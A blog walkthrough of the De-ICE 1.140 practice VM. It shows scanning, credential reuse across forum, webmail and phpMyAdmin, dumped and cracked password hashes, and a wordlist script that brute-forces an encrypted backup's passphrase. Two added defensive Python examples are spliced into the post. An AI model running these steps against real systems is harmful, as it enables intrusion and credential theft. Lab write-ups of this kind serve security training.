Wednesday, 8 January 2014

De-ICE 1.140

root@kali:~# netdiscover

 Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                         


   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:17:86:46    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.101  08:00:27:fe:04:1c    01    060   CADMUS COMPUTER SYSTEMS

root@kali:~# unicornscan -mT 192.168.56.101
TCP open                 ftp[   21]        from 192.168.56.101  ttl 64
TCP open                 ssh[   22]        from 192.168.56.101  ttl 64
TCP open                http[   80]        from 192.168.56.101  ttl 64
TCP open               https[  443]        from 192.168.56.101  ttl 64
TCP open               imaps[  993]        from 192.168.56.101  ttl 64
TCP open               pop3s[  995]        from 192.168.56.101  ttl 64

root@kali:~# nmap -sS -sV -O 192.168.56.101 -pT:21,22,80,443,993,995

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-07 13:29 CET
Nmap scan report for 192.168.56.101
Host is up (0.00044s latency).
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      ProFTPD 1.3.4a
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)
993/tcp open  ssl/imap Dovecot imapd
995/tcp open  ssl/pop3 Dovecot pop3d
MAC Address: 08:00:27:FE:04:1C (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.9, Linux 3.0 - 3.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2014-01-07 13:35:52 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2014-01-07 13:36:02 (GMT1) (10 seconds)
---------------------------------------------------------------------------

root@kali:~# nikto -ssl -host 192.168.56.101
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /CN=webhost
                   Ciphers: DHE-RSA-AES256-GCM-SHA384
                   Issuer:  /CN=webhost
+ Start Time:         2014-01-08 11:50:48 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1
+ Server leaks inodes via ETags, header found with file /, inode: 11996, size: 1782, mtime: 0x4da1930e20900
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.56.101' does not match certificate's CN 'webhost'
+ mod_ssl/2.2.22 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.1 appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ mod_ssl/2.2.22 OpenSSL/1.0.1 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ Cookie PHPSESSID created without the secure flag
+ Cookie PHPSESSID created without the httponly flag
+ Cookie mlf2_usersettings created without the secure flag
+ Cookie mlf2_usersettings created without the httponly flag
+ Cookie mlf2_last_visit created without the secure flag
+ Cookie mlf2_last_visit created without the httponly flag
+ OSVDB-3092: /forum/: This might be interesting...
+ Cookie phpMyAdmin created without the httponly flag
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Cookie SQMSESSID created without the secure flag
+ Cookie SQMSESSID created without the httponly flag
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2014-01-08 11:52:53 (GMT1) (125 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
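Both nikto runs above flag the same thing from the application side: session cookies (PHPSESSID, mlf2_usersettings, SQMSESSID, phpMyAdmin) issued without the HttpOnly and, over TLS, the Secure attribute. The check behind that finding is simple to reproduce, so here is an added example (not from the original post or from nikto) that parses raw Set-Cookie headers and lists the missing attributes. It also reports a missing SameSite attribute, which goes beyond what nikto 2.1.5 checked. The header values below are constructed placeholders, not captured from the target.

```python
# Constructed Set-Cookie headers using the cookie names nikto reported above;
# the cookie values and paths are placeholders, not captured from the target.
SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=placeholder1; path=/",
    "Set-Cookie: mlf2_usersettings=placeholder2; expires=Thu, 01 Jan 2015 00:00:00 GMT; path=/forum/",
    "Set-Cookie: SQMSESSID=placeholder3; path=/webmail/; HttpOnly",
    "Set-Cookie: phpMyAdmin=placeholder4; path=/phpmyadmin/; Secure; HttpOnly; SameSite=Lax",
]


def parse_set_cookie(header):
    """Split a raw Set-Cookie header into (name, value, {attribute: value}).

    Attribute names are lower-cased because they are case-insensitive;
    flag attributes such as HttpOnly map to an empty string.
    """
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in body.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_cookie(header, over_tls=True):
    """Return (cookie name, list of missing hardening attributes).

    Secure is only expected when the cookie is set over HTTPS, which is why
    nikto's plain-HTTP run above did not report it while the -ssl run did.
    """
    name, _, attrs = parse_set_cookie(header)
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if over_tls and "secure" not in attrs:
        missing.append("Secure")
    if "samesite" not in attrs:
        missing.append("SameSite")
    return name, missing


def audit_headers(headers, over_tls=True):
    """Map each cookie that lacks something to the list of missing attributes."""
    results = {}
    for header in headers:
        name, missing = audit_cookie(header, over_tls)
        if missing:
            results[name] = missing
    return results


if __name__ == "__main__":
    for name, missing in audit_headers(SAMPLE_HEADERS).items():
        print(f"{name}: missing {', '.join(missing)}")
```

For a PHP application like the forum, the fix for the first two attributes is server-side configuration (session.cookie_httponly and session.cookie_secure in php.ini, or the equivalent setcookie() arguments); the audit function is useful for confirming the change took effect on the live response headers.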


root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.101

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Tue Jan  7 13:36:44 2014
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://192.168.56.101/forum/
+ http://192.168.56.101/index (CODE:200|SIZE:1782)
+ http://192.168.56.101/index.html (CODE:200|SIZE:1782)
+ http://192.168.56.101/server-status (CODE:403|SIZE:215)

---- Entering directory: http://192.168.56.101/forum/ ----
+ http://192.168.56.101/forum/LICENSE (CODE:200|SIZE:33093)
+ http://192.168.56.101/forum/README (CODE:200|SIZE:730)
==> DIRECTORY: http://192.168.56.101/forum/backup/
==> DIRECTORY: http://192.168.56.101/forum/config/
==> DIRECTORY: http://192.168.56.101/forum/images/
==> DIRECTORY: http://192.168.56.101/forum/includes/
+ http://192.168.56.101/forum/index (CODE:200|SIZE:7348)
+ http://192.168.56.101/forum/index.php (CODE:200|SIZE:7348)
==> DIRECTORY: http://192.168.56.101/forum/install/
==> DIRECTORY: http://192.168.56.101/forum/js/
==> DIRECTORY: http://192.168.56.101/forum/lang/
==> DIRECTORY: http://192.168.56.101/forum/modules/
==> DIRECTORY: http://192.168.56.101/forum/templates_c/
==> DIRECTORY: http://192.168.56.101/forum/themes/
==> DIRECTORY: http://192.168.56.101/forum/update/

---- Entering directory: http://192.168.56.101/forum/backup/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                  
---- Entering directory: http://192.168.56.101/forum/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                  
---- Entering directory: http://192.168.56.101/forum/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/install/ ----
+ http://192.168.56.101/forum/install/index (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/index.php (CODE:302|SIZE:0)
+ http://192.168.56.101/forum/install/install (CODE:200|SIZE:12898)
                                  
---- Entering directory: http://192.168.56.101/forum/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/lang/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/templates_c/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.101/forum/update/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                              
-----------------
DOWNLOADED: 13776 - FOUND: 11

root@kali:/usr/share/dirb# dirb https://192.168.56.101 wordlists/small.txt

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Tue Jan  7 16:54:16 2014
URL_BASE: https://192.168.56.101/
WORDLIST_FILES: wordlists/small.txt

-----------------

GENERATED WORDS: 957                                                          

---- Scanning URL: https://192.168.56.101/ ----
+ https://192.168.56.101/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: https://192.168.56.101/forum/
+ https://192.168.56.101/index (CODE:200|SIZE:1782)
==> DIRECTORY: https://192.168.56.101/phpmyadmin/
==> DIRECTORY: https://192.168.56.101/webmail/

---- Entering directory: https://192.168.56.101/forum/ ----
+ Dumping session state and Quitting.
                                                                              
-----------------
DOWNLOADED: 1063 - FOUND: 2

http://192.168.56.101/forum/
http://192.168.56.101/forum/config/

sqlmap -u "http://192.168.56.101/forum/index.php" --data="mode=login&username=admin%27&userpw=a"
...
[13:49:41] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

http://192.168.56.101/forum/index.php?mode=user

sqlmap -u "http://192.168.56.101/forum/index.php?mode=user"
...
[13:53:05] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

admin      Admin       E-mail
MBrown     User        E-mail
RHedley    User        E-mail
SWillard   Moderator   E-mail

Sandy (sw@lazyadmins.corp)
Mark
Richy

sqlmap -u "http://192.168.56.101/forum/index.php?mode=user&show_user=1"
...
[13:56:03] [ERROR] possible integer casting detected (e.g. "$show_user=intval($_REQUEST['show_user'])") at the back-end web application do you want to skip those kind of cases (and save scanning time)? [y/N] y
[13:56:06] [INFO] skipping GET parameter 'show_user'
[13:56:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

http://192.168.56.101/forum/index.php?mode=contact&user_id=2

powered by my little forum

page source:
my little forum 2.3.1

forum:

Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
...
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
...
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2

by SWillard @, Monday, March 11, 2013, 09:43 (302 days ago)

Hi everybody

As you all know I got married a few days before (yay :-D)
And because of this I have changed my email-account to match MY NEEEWWW NAME :-D

Bye
Sandy Willard formerly known as Sandy Raines ;)
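The sshd excerpt posted on the forum shows a classic log-hygiene failure: a user typed their password into the username prompt, so it now sits in auth.log as "Invalid user <password> from <ip>", immediately followed by a successful login from the same address. Whoever reviews those logs should treat the string as a burned credential and rotate it. The following is an added example, not part of the original post, of a small detector for that pattern run over constructed sample lines in the same syslog format; the leaked value in the sample is a placeholder, not a real credential, and the 60-second window and the username pattern are my own assumptions.

```python
import re
from datetime import datetime

# Constructed sample in the sshd/syslog format quoted from the forum above.
# "NOT-A-REAL-SECRET-42" stands in for whatever was typed at the login prompt.
SAMPLE_LOG = """\
Mar 7 11:15:28 testbox sshd[5766]: Connection from 10.10.2.131 port 46487
Mar 7 11:15:32 testbox sshd[5772]: Connection from 10.0.0.23 port 35154
Mar 7 11:15:32 testbox sshd[5772]: Invalid user NOT-A-REAL-SECRET-42 from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user NOT-A-REAL-SECRET-42 [preauth]
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:20:01 testbox sshd[5801]: Invalid user admin from 10.0.0.99
Mar 7 11:20:05 testbox sshd[5802]: Invalid user guest from 10.0.0.99
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (?P<msg>.*)$")
INVALID_RE = re.compile(r"^Invalid user (?P<name>.+) from (?P<ip>\S+)$")
ACCEPT_RE = re.compile(r"^Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+")
# Assumed shape of a legitimate local account name (lower-case, POSIX-style, <= 32 chars).
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$")


def parse_sshd_log(log_text):
    """Return [(timestamp, message)] for the sshd lines; syslog has no year, so 1900 is used."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append((ts, m["msg"]))
    return events


def find_username_field_leaks(log_text, window_seconds=60):
    """Flag 'Invalid user' entries that look like a secret typed into the wrong field.

    Two independent signals are used: the rejected name does not look like an
    account name, and/or the same source address logs in successfully within
    window_seconds. Either one is enough to report; both appear in the real case.
    """
    events = parse_sshd_log(log_text)
    findings = []
    for i, (ts, msg) in enumerate(events):
        inv = INVALID_RE.match(msg)
        if not inv:
            continue
        reasons = []
        if not USERNAME_RE.match(inv["name"]):
            reasons.append("value does not look like a local username")
        accepted = None
        for ts2, msg2 in events[i + 1:]:
            if (ts2 - ts).total_seconds() > window_seconds:
                break
            acc = ACCEPT_RE.match(msg2)
            if acc and acc["ip"] == inv["ip"]:
                accepted = acc["user"]
                break
        if accepted:
            reasons.append(f"followed by a successful login as {accepted} from the same address")
        if reasons:
            findings.append({"leaked_value": inv["name"], "source": inv["ip"],
                             "accepted_user": accepted, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_username_field_leaks(SAMPLE_LOG):
        print(f"possible credential in log from {f['source']} (account {f['accepted_user']}): "
              + "; ".join(f["reasons"]))
```

The plain "admin" and "guest" attempts in the sample are not reported: they look like usernames and no login follows them, which is the ordinary brute-force noise a separate rule should count rather than this one. When a finding does fire, the response is to rotate the affected account's password and scrub or restrict the log line, since, as the forum post shows, anyone who can read the log can read the secret.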

https://192.168.56.101/forum/install/install

CREATE TABLE mlf2_userdata (user_id int(11) NOT NULL auto_increment, user_type tinyint(4) NOT NULL default '0', user_name varchar(255) NOT NULL default '', user_real_name varchar(255) NOT NULL default '', gender tinyint(4) NOT NULL default '0', birthday date NOT NULL default '0000-00-00', user_pw varchar(255) NOT NULL default '', user_email varchar(255) NOT NULL default '', email_contact tinyint(4) default '0', user_hp varchar(255) NOT NULL default '', user_location varchar(255) NOT NULL default '', signature varchar(255) NOT NULL default '', profile text NOT NULL, logins int(11) NOT NULL default '0', last_login timestamp NOT NULL default CURRENT_TIMESTAMP, last_logout timestamp NOT NULL default '0000-00-00 00:00:00', user_ip varchar(128) NOT NULL default '', registered timestamp NOT NULL default '0000-00-00 00:00:00', category_selection varchar(255) DEFAULT NULL, thread_order tinyint(4) NOT NULL default '0', user_view tinyint(4) NOT NULL default '0', sidebar tinyint(4) NOT NULL default '1', fold_threads tinyint(4) NOT NULL default '0', thread_display tinyint(4) NOT NULL default '0', new_posting_notification tinyint(4) default '0', new_user_notification tinyint(4) default '0', user_lock tinyint(4) default '0', auto_login_code varchar(50) NOT NULL default '', pwf_code varchar(50) NOT NULL, activate_code varchar(50) NOT NULL default '', language VARCHAR(255) NOT NULL DEFAULT '', time_zone VARCHAR(255) NOT NULL DEFAULT '', time_difference smallint(4) default '0', theme VARCHAR(255) NOT NULL DEFAULT '', entries_read TEXT NOT NULL, PRIMARY KEY (user_id)) CHAR SET=utf8 COLLATE=utf8_general_ci;
...

INSERT INTO mlf2_userdata VALUES (1, 2, 'admin', '', 0, '0000-00-00',
'c3ccb88dc0a985b9b5da20bb9333854194dfbc7767d91c6936', 'admin@example.com', 1, '', '', '', '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '', NOW(), NULL, 0, 0, 1, 0, 0, 0, 0, 0, '', '', '', '', '', 0, '', '');

http://192.168.56.101/forum/index.php?mode=login

user : mbrown
pass: !DFiuoTkbxtdk0!

http://192.168.56.101/forum/index.php?mode=user&action=edit_profile

E-mail:     mb@lazyadmin.corp

Log out

https://192.168.56.101/webmail/src/login.php

username mb@lazyadmin.corp
pass: !DFiuoTkbxtdk0!

https://192.168.56.101/webmail/src/read_body.php?mailbox=INBOX&passed_id=2&startMessage=1

From:       sw@lazyadmin.corp
Date:       Sun, March 10, 2013 9:23 am
To:       mb@lazyadmin.corp
Priority:       Normal
Options:       View Full Header |  View Printable Version  | Download this as a file

Hi,

here is the login information for MySQL:

Username: root
Password: S4!y.dk)j/_d1pKtX1


Regards,
Sandy

Subject:       Audit
From:       sw@lazyadmin.corp
Date:       Sat, March 16, 2013 8:19 pm
To:       mb@lazyadmin.corp
Priority:       Normal
Options:       View Full Header |  View Printable Version  | Download this as a file

Hi Mark,

last we have made a password audit for all of our systems and we have seen
that you are using the same password for a few services.
Please be so kind and change your passwords. Please keep in mind to use
different passwords for different services. :)

Thank you!
Sandy

https://192.168.56.101/phpmyadmin/

https://192.168.56.101/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1 Documentation

https://192.168.56.101/phpmyadmin/index.php?

user : root
pass: S4!y.dk)j/_d1pKtX1

Exporting rows from "mlf2_userdata" table

"1","2","admin",,"0","0000-00-00","fd339d53bf599d4ec7281ace84a902dc2ca16c7f63cbb16261","webmaster@lazyadmin.corp","1",,,,,"10","2013-03-24 19:03:02","2013-03-24 19:08:31","192.168.8.1","2013-03-09 15:57:17",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"2","0","RHedley","Richard Hedley","1","0000-00-00","31cbbdab9f5e1ebfa7d81267c258e29b5f9e171e6fcf7b1ba3","rh@lazyadmin.corp","1",,,,,"5","2013-03-24 19:09:38","2013-03-24 19:09:52","192.168.8.1","2013-03-09 16:22:22",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"
"3","0","MBrown","Mark Brown","1","0000-00-00","8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1","mb@lazyadmin.corp","1",,,,,"7","2014-01-07 17:02:50","2014-01-07 17:02:50","192.168.56.102","2013-03-09 16:23:28",NULL,"0","0","1","0","0","0","0","0",,,,,,"0",,"15,4,2,1,3,5,9,10,11,12,13,14,7,6,8"
"4","1","SWillard","Sandy Willard","2","0000-00-00","c19038340b8f5d1fc70e9bfbc3336f7bf1e0935da5ef13d4ef","sw@lazyadmin.corp","1",,,,,"8","2013-03-24 19:09:08","2013-03-24 19:09:27","192.168.8.1","2013-03-09 16:25:13",NULL,"0","1","1","0","0","0","0","0",,,,,,"0",,"6,10,11,12,13,14,8,9,7,15,1,2,3,4,5"

Exporting rows from "admin" table
"postfix@lazyadmin.corp","d189d0c727a549f263b93176fc851cec","2013-03-09 17:34:21","2013-03-24 19:01:06","1"

Exporting rows from "mailbox" table
"rh@lazyadmin.corp","20f1275ce5e67be2c06476333b68f585","Richard Hedley","rh@lazyadmin.corp/","0","rh","lazyadmin.corp","2013-03-09 18:55:10","2013-03-24 19:02:10","1"
"sw@lazyadmin.corp","07255e7701a86ad1672765d15082f1a3","Sandy Willard","sw@lazyadmin.corp/","0","sw","lazyadmin.corp","2013-03-09 18:56:35","2013-03-24 19:02:23","1"
"mb@lazyadmin.corp","d768176c4486ce77787c73883406fe97","Mark Brown","mb@lazyadmin.corp/","0","mb","lazyadmin.corp","2013-03-09 18:56:55","2013-03-24 19:01:37","1"
"mp@lazyadmin.corp","fa514a9f39391658b15d5db542029aa6","Miles Parker","mp@lazyadmin.corp/","0","mp","lazyadmin.corp","2013-03-09 21:14:40","2013-03-24 19:01:57","1"

Exporting rows from "user" table
"localhost","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"ubuntu","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"127.0.0.1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"::1","root","*05DE4B3ED9B4F36FAAEC8EF25689468318481FEB","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,
"localhost",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"ubuntu",,,"N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","debian-sys-maint","*27F84EF9FAA0E841963E4963EFC8D0EC7443A820","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","N",,,,,"0","0","0","0",,NULL
"localhost","phpmyadmin","*1E8775B9D4F8EF5A6722E7E0C57BA5985872FB98","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","mail","*0616BA40862AA9B5B194CD196808176F644B2828","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N","N",,,,,"0","0","0","0",,NULL
"localhost","forum","*FEAFF5308E872DB9CFBB7585CD62CB7383B53E75","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y",,,,,"0","0","0","0",,NULL

https://crackstation.net/
20f1275ce5e67be2c06476333b68f585
07255e7701a86ad1672765d15082f1a3
d768176c4486ce77787c73883406fe97
fa514a9f39391658b15d5db542029aa6

20f1275ce5e67be2c06476333b68f585
    md5    tum-ti-tum
07255e7701a86ad1672765d15082f1a3
    md5    Austin-Willard
d768176c4486ce77787c73883406fe97    Unknown    Not Found
fa514a9f39391658b15d5db542029aa6    Unknown    Not Found

root@kali:/usr/share/dirb# ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.56.101]
Name (192.168.56.101:root): rhedley
331 Password required for rhedley
Password: (tum-ti-tum)
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd ..
250 CWD command successful
ftp> pwd
257 "/" is the current directory
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxr-x   1 root     root           60 May 13  2013 ftp
drwxrwx---   1 mbrown   mbrown         60 Mar 24  2013 mbrown
drwxrwx---   1 mparker  mparker        40 Apr 11  2013 mparker
drwxrwx---   2 rhedley  rhedley        87 Mar 24  2013 rhedley
drwxr-xr-x   2 1000     1000           36 May 12  2013 sraines
drwxrwx---   5 swillard swillard      128 May 12  2013 swillard
226 Transfer complete

ftp> cd ftp
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
d-wxrwx-wx   1 ftp      ftpadmin       60 May 13  2013 incoming
226 Transfer complete
ftp> cd incoming
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
--w-rwx-w-   1 ftp      ftpuser     47984 Jan 11  2013 backup_webhost_130111.tar.gz.enc

ftp> get backup_webhost_130111.tar.gz.enc
local: backup_webhost_130111.tar.gz.enc remote: backup_webhost_130111.tar.gz.enc
200 PORT command successful
150 Opening BINARY mode data connection for backup_webhost_130111.tar.gz.enc (47984 bytes)
226 Transfer complete
47984 bytes received in 0.00 secs (63067.8 kB/s)

root@kali:~# hd backup_webhost_130111.tar.gz.enc | more

00000000  53 61 6c 74 65 64 5f 5f  6e 39 35 1e fa ac ea b9  |Salted__n95.....|
00000010  13 37 de 82 6f 35 c8 5c  ad 90 eb 83 12 eb 05 af  |.7..o5.\........|
00000020  4f 7c b2 0d 51 ad f6 41  cd 7f 80 81 78 cf d7 7a  |O|..Q..A....x..z|

This is an OpenSSL salted encrypted file: the ASCII magic "Salted__" is followed by the 8-byte salt (6e 39 35 1e fa ac ea b9).

I made an encrypt.sh:

#!/bin/bash
# Try each wordlist entry as the passphrase for the downloaded backup.
# Note: exit status 0 from openssl only means the last block's padding
# checked out; it does not prove the plaintext is the real archive.

WORDLIST=/usr/share/wordlists/metasploit-jtr/password.lst
ENC=backup_webhost_130111.tar.gz.enc
OUT=backup_webhost_130111.tar.gz

while IFS= read -r LINE; do
  echo "$LINE"
  # Quote the passphrase so entries with spaces or shell metacharacters are passed intact.
  if openssl enc -d -des3 -in "$ENC" -out "$OUT" -pass "pass:$LINE"; then
    break
  fi
done < "$WORDLIST"

./encrypt.sh
...
abscond
bad decrypt
3074345112:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:539:
absconder

The password is absconder?

root@kali:~# openssl enc -d -des3 -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -pass pass:absconder -p
salt=6E39351EFAACEAB9
key=61F734DD3D559913060B3A5F164B853A4D3777688F334E46
iv =677740BB2E10FD0A

root@kali:~# file backup_webhost_130111.tar.gz
backup_webhost_130111.tar.gz: data

Something is wrong....
